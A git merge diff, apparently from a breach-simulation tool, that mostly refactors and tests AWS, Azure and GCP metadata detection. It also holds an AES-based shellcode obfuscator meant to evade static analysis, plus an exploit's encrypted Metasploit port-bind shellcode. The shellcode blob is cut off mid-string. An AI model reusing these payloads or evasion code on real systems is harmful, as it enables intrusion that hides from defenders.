Merge remote-tracking branch 'upstream/develop' into 519/scoutsuite-integration

This commit is contained in:
VakarisZ 2021-02-17 16:59:06 +02:00
commit 414dbf0665
13 changed files with 632 additions and 63 deletions

View File

@ -1,8 +1,7 @@
import json
import logging
import re
import urllib.error
import urllib.request
import requests
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
@ -33,19 +32,17 @@ class AwsInstance(CloudInstance):
self.account_id = None
try:
self.instance_id = urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2)
self.instance_id = response.text if response else None
self.region = self._parse_region(
urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
except (urllib.error.URLError, IOError) as e:
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text)
except (requests.RequestException, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try:
self.account_id = self._extract_account_id(
urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read().decode())
except (urllib.error.URLError, IOError) as e:
requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
@staticmethod

View File

@ -0,0 +1,300 @@
import json
import pytest
import requests
import requests_mock
from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX,
AwsInstance)
from common.cloud.environment_names import Environment
INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0'
AVAILABILITY_ZONE_RESPONSE = 'us-west-2b'
# from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
{
"devpayProductCodes": null,
"marketplaceProductCodes": ["1abc2defghijklm3nopqrs4tu"],
"availabilityZone": "us-west-2b",
"privateIp": "10.158.112.84",
"version": "2017-09-30",
"instanceId": "i-1234567890abcdef0",
"billingProducts": null,
"instanceType": "t2.micro",
"accountId": "123456789012",
"imageId": "ami-5fb8c835",
"pendingTime": "2016-11-19T16:32:11Z",
"architecture": "x86_64",
"kernelId": null,
"ramdiskId": null,
"region": "us-west-2"
}
"""
EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0'
EXPECTED_REGION = 'us-west-2'
EXPECTED_ACCOUNT_ID = '123456789012'
def get_test_aws_instance(text={'instance_id': None,
'region': None,
'account_id': None},
exception={'instance_id': None,
'region': None,
'account_id': None}):
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
m.get(url, text=text['instance_id']) if text['instance_id'] else m.get(
url, exc=exception['instance_id'])
# request made to get region
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
m.get(url, text=text['region']) if text['region'] else m.get(
url, exc=exception['region'])
# request made to get account_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
m.get(url, text=text['account_id']) if text['account_id'] else m.get(
url, exc=exception['account_id'])
test_aws_instance_object = AwsInstance()
return test_aws_instance_object
# all good data
@pytest.fixture
def good_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
def test_is_instance_good_data(good_data_mock_instance):
assert good_data_mock_instance.is_instance()
def test_get_cloud_provider_name_good_data(good_data_mock_instance):
assert good_data_mock_instance.get_cloud_provider_name() == Environment.AWS
def test_get_instance_id_good_data(good_data_mock_instance):
assert good_data_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
def test_get_region_good_data(good_data_mock_instance):
assert good_data_mock_instance.get_region() == EXPECTED_REGION
def test_get_account_id_good_data(good_data_mock_instance):
assert good_data_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
# 'region' bad data
@pytest.fixture
def bad_region_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': 'in-a-different-world',
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE})
def test_is_instance_bad_region_data(bad_region_data_mock_instance):
assert bad_region_data_mock_instance.is_instance()
def test_get_cloud_provider_name_bad_region_data(bad_region_data_mock_instance):
assert bad_region_data_mock_instance.get_cloud_provider_name() == Environment.AWS
def test_get_instance_id_bad_region_data(bad_region_data_mock_instance):
assert bad_region_data_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
def test_get_region_bad_region_data(bad_region_data_mock_instance):
assert bad_region_data_mock_instance.get_region() is None
def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
assert bad_region_data_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
# 'account_id' bad data
@pytest.fixture
def bad_account_id_data_mock_instance():
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': 'who-am-i'})
def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance):
assert bad_account_id_data_mock_instance.is_instance()
def test_get_cloud_provider_name_bad_account_id_data(bad_account_id_data_mock_instance):
assert bad_account_id_data_mock_instance.get_cloud_provider_name() == Environment.AWS
def test_get_instance_id_bad_account_id_data(bad_account_id_data_mock_instance):
assert bad_account_id_data_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
def test_get_region_bad_account_id_data(bad_account_id_data_mock_instance):
assert bad_account_id_data_mock_instance.get_region() == EXPECTED_REGION
def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instance):
assert bad_account_id_data_mock_instance.get_account_id() is None
# 'instance_id' bad requests
@pytest.fixture
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(text={'instance_id': None,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
exception={'instance_id': instance_id_exception,
'region': None,
'account_id': None})
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.is_instance() is False
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_instance_id() is None
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_region() is None
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
# 'region' bad requests
@pytest.fixture
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': None,
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
exception={'instance_id': None,
'region': region_exception,
'account_id': None})
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
def test_is_instance_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.is_instance()
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
def test_get_instance_id_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
def test_get_region_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_region() is None
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
# 'account_id' bad requests
@pytest.fixture
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
'region': AVAILABILITY_ZONE_RESPONSE,
'account_id': None},
exception={'instance_id': None,
'region': None,
'account_id': account_id_exception})
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.is_instance()
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance):
assert bad_account_id_request_mock_instance.get_account_id() is None
# not found request
@pytest.fixture
def not_found_request_mock_instance():
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
m.get(url, status_code=404)
# request made to get region
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
m.get(url)
# request made to get account_id
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
m.get(url)
not_found_aws_instance_object = AwsInstance()
return not_found_aws_instance_object
def test_is_instance_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.is_instance() is False
def test_get_cloud_provider_name_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_cloud_provider_name() == Environment.AWS
def test_get_instance_id_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_instance_id() is None
def test_get_region_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_region() is None
def test_get_account_id_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_account_id() is None

View File

@ -1,6 +1,7 @@
import logging
import requests
import simplejson
from common.cloud.environment_names import Environment
from common.cloud.instance import CloudInstance
@ -18,7 +19,7 @@ class AzureInstance(CloudInstance):
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
return self.on_azure
return self._on_azure
def get_cloud_provider_name(self) -> Environment:
return Environment.AZURE
@ -30,24 +31,22 @@ class AzureInstance(CloudInstance):
self.instance_name = None
self.instance_id = None
self.location = None
self.on_azure = False
self._on_azure = False
try:
response = requests.get(AZURE_METADATA_SERVICE_URL,
headers={"Metadata": "true"},
timeout=SHORT_REQUEST_TIMEOUT)
self.on_azure = True
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
if response:
logger.debug("On Azure. Trying to parse metadata.")
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
else:
logger.warning("On Azure, but metadata response not ok: {}".format(response.status_code))
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
self.on_azure = False
def try_parse_response(self, response):
try:
@ -55,5 +54,6 @@ class AzureInstance(CloudInstance):
self.instance_name = response_data["compute"]["name"]
self.instance_id = response_data["compute"]["vmId"]
self.location = response_data["compute"]["location"]
except KeyError:
logger.exception("Error while parsing response from Azure metadata service.")
self._on_azure = True
except (KeyError, simplejson.errors.JSONDecodeError) as e:
logger.exception(f"Error while parsing response from Azure metadata service: {e}")

View File

@ -0,0 +1,199 @@
import pytest
import requests
import requests_mock
import simplejson
from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL,
AzureInstance)
from common.cloud.environment_names import Environment
GOOD_DATA = {
'compute': {'azEnvironment': 'AZUREPUBLICCLOUD',
'isHostCompatibilityLayerVm': 'true',
'licenseType': 'Windows_Client',
'location': 'westus',
'name': 'examplevmname',
'offer': 'Windows',
'osProfile': {'adminUsername': 'admin',
'computerName': 'examplevmname',
'disablePasswordAuthentication': 'true'},
'osType': 'linux',
'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a',
'plan': {'name': 'planName',
'product': 'planProduct',
'publisher': 'planPublisher'},
'platformFaultDomain': '36',
'platformUpdateDomain': '42',
'publicKeys': [{'keyData': 'ssh-rsa 0',
'path': '/home/user/.ssh/authorized_keys0'},
{'keyData': 'ssh-rsa 1',
'path': '/home/user/.ssh/authorized_keys1'}],
'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group',
'resourceGroupName': 'macikgo-test-may-23',
'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/'
'providers/Microsoft.Compute/virtualMachines/examplevmname',
'securityProfile': {'secureBootEnabled': 'true',
'virtualTpmEnabled': 'false'},
'sku': 'Windows-Server-2012-R2-Datacenter',
'storageProfile': {'dataDisks': [{'caching': 'None',
'createOption': 'Empty',
'diskSizeGB': '1024',
'image': {'uri': ''},
'lun': '0',
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
'resourceGroups/macikgo-test-may-23/providers/'
'Microsoft.Compute/disks/exampledatadiskname',
'storageAccountType': 'Standard_LRS'},
'name': 'exampledatadiskname',
'vhd': {'uri': ''},
'writeAcceleratorEnabled': 'false'}],
'imageReference': {'id': '',
'offer': 'UbuntuServer',
'publisher': 'Canonical',
'sku': '16.04.0-LTS',
'version': 'latest'},
'osDisk': {'caching': 'ReadWrite',
'createOption': 'FromImage',
'diskSizeGB': '30',
'diffDiskSettings': {'option': 'Local'},
'encryptionSettings': {'enabled': 'false'},
'image': {'uri': ''},
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
'resourceGroups/macikgo-test-may-23/providers/'
'Microsoft.Compute/disks/exampleosdiskname',
'storageAccountType': 'Standard_LRS'},
'name': 'exampleosdiskname',
'osType': 'Linux',
'vhd': {'uri': ''},
'writeAcceleratorEnabled': 'false'}},
'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx',
'tags': 'baz:bash;foo:bar',
'version': '15.05.22',
'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6',
'vmScaleSetName': 'crpteste9vflji9',
'vmSize': 'Standard_A3',
'zone': ''},
'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132',
'publicIpAddress': ''}],
'subnet': [{'address': '10.144.133.128',
'prefix': '26'}]},
'ipv6': {'ipAddress': []},
'macAddress': '0011AAFFBB22'}]}
}
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<title>Waiting...</title>\n<script type="text/\
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_JSON = {'': ''}
def get_test_azure_instance(url, **kwargs):
with requests_mock.Mocker() as m:
m.get(url, **kwargs)
test_azure_instance_object = AzureInstance()
return test_azure_instance_object
# good request, good data
@pytest.fixture
def good_data_mock_instance():
return get_test_azure_instance(AZURE_METADATA_SERVICE_URL, text=simplejson.dumps(GOOD_DATA))
def test_is_instance_good_data(good_data_mock_instance):
assert good_data_mock_instance.is_instance()
def test_get_cloud_provider_name_good_data(good_data_mock_instance):
assert good_data_mock_instance.get_cloud_provider_name() == Environment.AZURE
def test_try_parse_response_good_data(good_data_mock_instance):
assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name']
assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId']
assert good_data_mock_instance.location == GOOD_DATA['compute']['location']
# good request, bad data (json)
@pytest.fixture
def bad_data_json_mock_instance():
return get_test_azure_instance(AZURE_METADATA_SERVICE_URL, text=simplejson.dumps(BAD_DATA_JSON))
def test_is_instance_bad_data_json(bad_data_json_mock_instance):
assert bad_data_json_mock_instance.is_instance() is False
def test_get_cloud_provider_name_bad_data_json(bad_data_json_mock_instance):
assert bad_data_json_mock_instance.get_cloud_provider_name() == Environment.AZURE
def test_instance_attributes_bad_data_json(bad_data_json_mock_instance):
assert bad_data_json_mock_instance.instance_name is None
assert bad_data_json_mock_instance.instance_id is None
assert bad_data_json_mock_instance.location is None
# good request, bad data (not json)
@pytest.fixture
def bad_data_not_json_mock_instance():
return get_test_azure_instance(AZURE_METADATA_SERVICE_URL, text=BAD_DATA_NOT_JSON)
def test_is_instance_bad_data_not_json(bad_data_not_json_mock_instance):
assert bad_data_not_json_mock_instance.is_instance() is False
def test_get_cloud_provider_name_bad_data_not_json(bad_data_not_json_mock_instance):
assert bad_data_not_json_mock_instance.get_cloud_provider_name() == Environment.AZURE
def test_instance_attributes_bad_data_not_json(bad_data_not_json_mock_instance):
assert bad_data_not_json_mock_instance.instance_name is None
assert bad_data_not_json_mock_instance.instance_id is None
assert bad_data_not_json_mock_instance.location is None
# bad request
@pytest.fixture
def bad_request_mock_instance():
return get_test_azure_instance(AZURE_METADATA_SERVICE_URL, exc=requests.RequestException)
def test_is_instance_bad_request(bad_request_mock_instance):
assert bad_request_mock_instance.is_instance() is False
def test_get_cloud_provider_name_bad_request(bad_request_mock_instance):
assert bad_request_mock_instance.get_cloud_provider_name() == Environment.AZURE
def test_instance_attributes_bad_request(bad_request_mock_instance):
assert bad_request_mock_instance.instance_name is None
assert bad_request_mock_instance.instance_id is None
assert bad_request_mock_instance.location is None
# not found request
@pytest.fixture
def not_found_request_mock_instance():
return get_test_azure_instance(AZURE_METADATA_SERVICE_URL, status_code=404)
def test_is_instance_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.is_instance() is False
def test_get_cloud_provider_name_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_cloud_provider_name() == Environment.AZURE
def test_instance_attributes_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.instance_name is None
assert not_found_request_mock_instance.instance_id is None
assert not_found_request_mock_instance.location is None

View File

@ -17,13 +17,13 @@ class GcpInstance(CloudInstance):
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
"""
def is_instance(self):
return self.on_gcp
return self._on_gcp
def get_cloud_provider_name(self) -> Environment:
return Environment.GCP
def __init__(self):
self.on_gcp = False
self._on_gcp = False
try:
# If not on GCP, this domain shouldn't resolve.
@ -31,7 +31,7 @@ class GcpInstance(CloudInstance):
if response:
logger.debug("Got ok metadata response: on GCP")
self.on_gcp = True
self._on_gcp = True
if "Metadata-Flavor" not in response.headers:
logger.warning("Got unexpected GCP Metadata format")
@ -42,4 +42,4 @@ class GcpInstance(CloudInstance):
logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
except requests.RequestException:
logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
self.on_gcp = False
self._on_gcp = False

View File

@ -0,0 +1,55 @@
import pytest
import requests
import requests_mock
from common.cloud.environment_names import Environment
from common.cloud.gcp.gcp_instance import GCP_METADATA_SERVICE_URL, GcpInstance
def get_test_gcp_instance(url, **kwargs):
with requests_mock.Mocker() as m:
m.get(url, **kwargs)
test_gcp_instance_object = GcpInstance()
return test_gcp_instance_object
# good request
@pytest.fixture
def good_request_mock_instance():
return get_test_gcp_instance(GCP_METADATA_SERVICE_URL)
def test_is_instance_good_request(good_request_mock_instance):
assert good_request_mock_instance.is_instance()
def test_get_cloud_provider_name_good_request(good_request_mock_instance):
assert good_request_mock_instance.get_cloud_provider_name() == Environment.GCP
# bad request
@pytest.fixture
def bad_request_mock_instance():
return get_test_gcp_instance(GCP_METADATA_SERVICE_URL, exc=requests.RequestException)
def test_is_instance_bad_request(bad_request_mock_instance):
assert bad_request_mock_instance.is_instance() is False
def test_get_cloud_provider_name_bad_request(bad_request_mock_instance):
assert bad_request_mock_instance.get_cloud_provider_name() == Environment.GCP
# not found request
@pytest.fixture
def not_found_request_mock_instance():
return get_test_gcp_instance(GCP_METADATA_SERVICE_URL, status_code=404)
def test_is_instance_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.is_instance() is False
def test_get_cloud_provider_name_not_found_request(not_found_request_mock_instance):
assert not_found_request_mock_instance.get_cloud_provider_name() == Environment.GCP

View File

@ -1,23 +1,30 @@
# This code is used to obfuscate shellcode
# Usage:
# shellcode_obfuscator.py [your normal shellcode].
# For example:
# shellcode_obfuscator.py "\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
# This returns "\x30\x76\x7b\x07\xa8\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52"
# Verify that it's the same shellcode, just reversed and paste it in code.
# Then clarify it before usage to reverse it on runtime.
import sys
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports
from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
def obfuscate(shellcode: str) -> str:
shellcode = shellcode.split('\\')[::-1]
return '\\'+'\\'.join(shellcode)[:-1]
# We only encrypt payloads to hide them from static analysis
# it's OK to have these keys plaintext
KEY = b'1234567890123456'
NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f'
def clarify(shellcode: str) -> str:
return shellcode[::-1]
# Use this manually to get obfuscated bytes of shellcode
def obfuscate(shellcode: bytes) -> bytes:
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
ciphertext, _ = cipher.encrypt_and_digest(shellcode)
return ciphertext
def clarify(shellcode: bytes) -> bytes:
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
plaintext = cipher.decrypt(shellcode)
return plaintext
if __name__ == "__main__":
print(obfuscate(sys.argv[1]))
print(obfuscate(sys.argv[1].encode()))

View File

@ -2,16 +2,14 @@ from unittest import TestCase
from common.utils.shellcode_obfuscator import clarify, obfuscate
SHELLCODE_FROM_CMD_PARAM = '\\x52\\x3d\\xf6\\xc9\\x4b\\x5d\\xe0\\x62\\x7e\\x3d\\xa8\\x07\\x7b\\x76\\x30'
OBFUSCATED_PARAM_OUTPUT = '\\x30\\x76\\x7b\\x07\\xa8\\x3d\\x7e\\x62\\xe0\\x5d\\x4b\\xc9\\xf6\\x3d\\x52'
OBFUSCATED_SHELLCODE = "\x30\x76\x7b\x07\xa8\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52"
CLARIFIED_SHELLCODE = "\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
SHELLCODE = b'1234567890abcd'
OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^='
class TestShellcodeObfuscator(TestCase):
def test_obfuscate(self):
self.assertEqual(obfuscate(SHELLCODE_FROM_CMD_PARAM), OBFUSCATED_PARAM_OUTPUT)
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
def test_clarify(self):
self.assertEqual(clarify(OBFUSCATED_SHELLCODE), CLARIFIED_SHELLCODE)
assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE

View File

@ -25,27 +25,36 @@ from infection_monkey.network.tools import check_tcp_port
LOG = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444
OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x66\xb5\xbb\x7f\x49\x2e"
"\x2d\x2a\x4a\x1d\x62\x79\x49\x7d\x16\x56\xdc\x9c\x16\xfa\x78\x4f\x30\x04\xde"
"\x9a\x16\xf8\xe3\x1b\xb8\xa8\xdc\x1b\xb8\xf8\xe4\x1d\xb2\x7f\x49\x0e\x9c\x56"
"\xa0\xf9\x17\xdb\xde\xe1\x42\x02\x8e\x30\x64\x3a\x9a\x08\x17\x84\xf4\xb4\x43"
"\x5a\x76\x7b\x0b\x20\xf2\x20\x0e\x20\x7a\x63\xb0\xf9\xdc\xaf\x60\xc4\xd5\x22"
"\x8f\xcd\xdc\x2c\x39\x56\xe3\x9c\x16\xfe\xcf\x8c\x90\x4e\xde\xd9\x39\x56\xe3"
"\x1e\xbd\xf9\x60\xb5\xbe\xe0\x30\x03\x0c\xc1\x66\xb5\xbc\xfa\x60\xb5\xbe\x40"
"\x98\xe7\x4d\xc1\x66\xb5\xbc\xf8\xa6\x20\x3f\x56\xe1\x8d\x99\xb3\x12\x22\x7c"
"\x48\x3f\x19\x8f\xf5\xa7\x22\x8f\x79\x49\x19\xaa\xfa\xf5\x19\xba\xfa\xe5\x19"
"\x3f\x56\xe1\xe7\x1c\xa0\x6f\x22\x39\x56\xb4\x20\xbc\xab\xbe\xa7\x68\xcf\x53"
"\xc3\xb6\x7f\x49\x1a\xd2\x55\x5b\x81\x81\x79\x49\x1e\xb6\x9b\xc5\x3d\x81\x9b"
"\x85\x22\x8f\xfa\xd0\x9c\x16\xf9\x5a\x44\xa7\x27\xde\x14\xe1\xe9\x3d\xe7\xf5"
"\xd9\x3d\x46\xa9\x22\x86\x09\x62\xcd\x6d\x7b\x2a\xc8\xaa\x6e\x85\x20\x3d\x66"
"\xea\x42\xb7\x56\xb6\x22\xfd\x46\x62\xcf\x5d\x4b\xcd\xf6\x3d\xaf\x9c\x81\x92"
"\x1e\xd2\x5d\x5d\x88\xe8\xa4\x7c\x8b\xee\xdd\x76\xce\x45\x30\x76\x7b\x07\xa8"
"\x3d\x7e\x62\xe0\x5d\x4b\xc9\xf6\x3d\x52\xa6\x22\x59\x4b\x91\xac\xca\xc1\xd5"
"\xec\x3d\x6e\xcd\xc5\x3d\x2a\x16\x56\x49\xb3\x01\xe4\x5d\x20\x15\xf4\xe2\xfc"
"\xee\x83\xa9\xb6\x4a\xe9\x0e\x76\x81\x5e\xc0\xff\xff\xff\xff\xe8\xb0\xe9\x83"
"\xc9\x29\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90")
OBFUSCATED_SHELLCODE = (b'4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9(\'\xa5%4m\xcd\xa0c\xd9'
b'\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3'
b'\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c'
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
b'\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c'
b'\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b'
b'\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd'
b'\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B'
b'\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f'
b'\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3'
b'\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe'
b'\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80'
b'\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97'
b'\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY'
b'\xa90\xcd\x94\xb7\x800\'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq'
b'\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh'
b'\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V'
b'\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T'
b'\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79'
b'\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($'
b'\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c'
